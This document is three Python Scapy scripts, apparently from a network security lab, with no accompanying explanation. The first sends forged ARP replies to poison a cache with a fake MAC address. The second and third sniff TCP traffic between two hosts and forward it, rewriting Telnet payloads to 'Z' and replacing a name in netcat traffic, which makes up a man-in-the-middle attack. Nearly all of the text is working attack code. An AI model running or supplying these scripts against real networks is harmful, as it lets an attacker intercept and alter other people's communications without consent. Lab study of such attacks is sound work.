from scapy.all import *

B = "10.0.2.6"
Fake_MAC = "12:34:56:78:9A:BC"

E_layer = Ether()
E_layer.dst = "ff:ff:ff:ff:ff:ff"

A_layer = ARP()
A_layer.op = 2
A_layer.hwdst = "ff:ff:ff:ff:ff:ff"
A_layer.hwsrc = Fake_MAC
A_layer.psrc = B
A_layer.pdst = B

pkt = E_layer / A_layer

pkt.show()
sendp(pkt, verbose=True)









from scapy.all import *

# ... imports, initialization of addresses and Step 1 (refer to full code) ...

def tcp_spoof_pkt_telnet(pkt):
    if pkt.haslayer(Ether) and pkt.haslayer(IP) and pkt.haslayer(TCP):
        if pkt[Ether].src != M_mac:
            if pkt[IP].src == A and pkt[IP].dst == B:
                print("From A to B")
                pkt[Ether].src = M_mac
                pkt[Ether].dst = B_mac

                # Handle and replace payload
                if pkt[TCP].payload:
                    try:
                        data = pkt[TCP].payload.load.decode("utf-8")
                        del pkt[TCP].payload
                        del pkt[TCP].chksum
                        pkt[TCP] /= 'Z'  # Replace with 'Z'
                    except UnicodeDecodeError:
                        print("Payload not UTF-8 decodable")

                sendp(pkt, verbose=False)

            elif pkt[IP].src == B and pkt[IP].dst == A:
                print("From B to A")
                pkt[Ether].src = M_mac
                pkt[Ether].dst = A_mac
                sendp(pkt, verbose=False)  # Forward the original packet

# Step 4: Launch MITM attack
pkt = sniff(filter='tcp', prn=tcp_spoof_pkt_telnet)








from scapy.all import *

A = "10.9.0.5"
B = "10.9.0.6"
M_mac = "02:42:0a:09:00:69"
A_mac = "02:42:0a:09:00:05"
B_mac = "02:42:0a:09:00:06"

first_name = "huiqing"
replacement_txt = "aaaaaaa"

def censor_payload(payload):
    return payload.replace(first_name, replacement_txt)

def tcp_spoof_pkt_netcat(pkt):
    if pkt.haslayer(Ether) and pkt.haslayer(IP) and pkt.haslayer(TCP):
        if pkt[Ether].src != M_mac:
            if pkt[IP].src == A and pkt[IP].dst == B:
                pkt[Ether].src = M_mac
                pkt[Ether].dst = B_mac

                if pkt[TCP].payload:
                    try:
                        payload = pkt[TCP].payload.load.decode("utf-8")
                        censored_payload = censor_payload(payload)
                        del pkt[TCP].payload
                        del pkt[TCP].chksum
                        pkt[TCP] /= censored_payload
                    except UnicodeDecodeError:
                        pass
                sendp(pkt, verbose=False)
            elif pkt[IP].src == B and pkt[IP].dst == A:
                pkt[Ether].src = M_mac
                pkt[Ether].dst = A_mac
                sendp(pkt, verbose=False)

pkt = sniff(filter="tcp", prn=tcp_spoof_pkt_netcat)

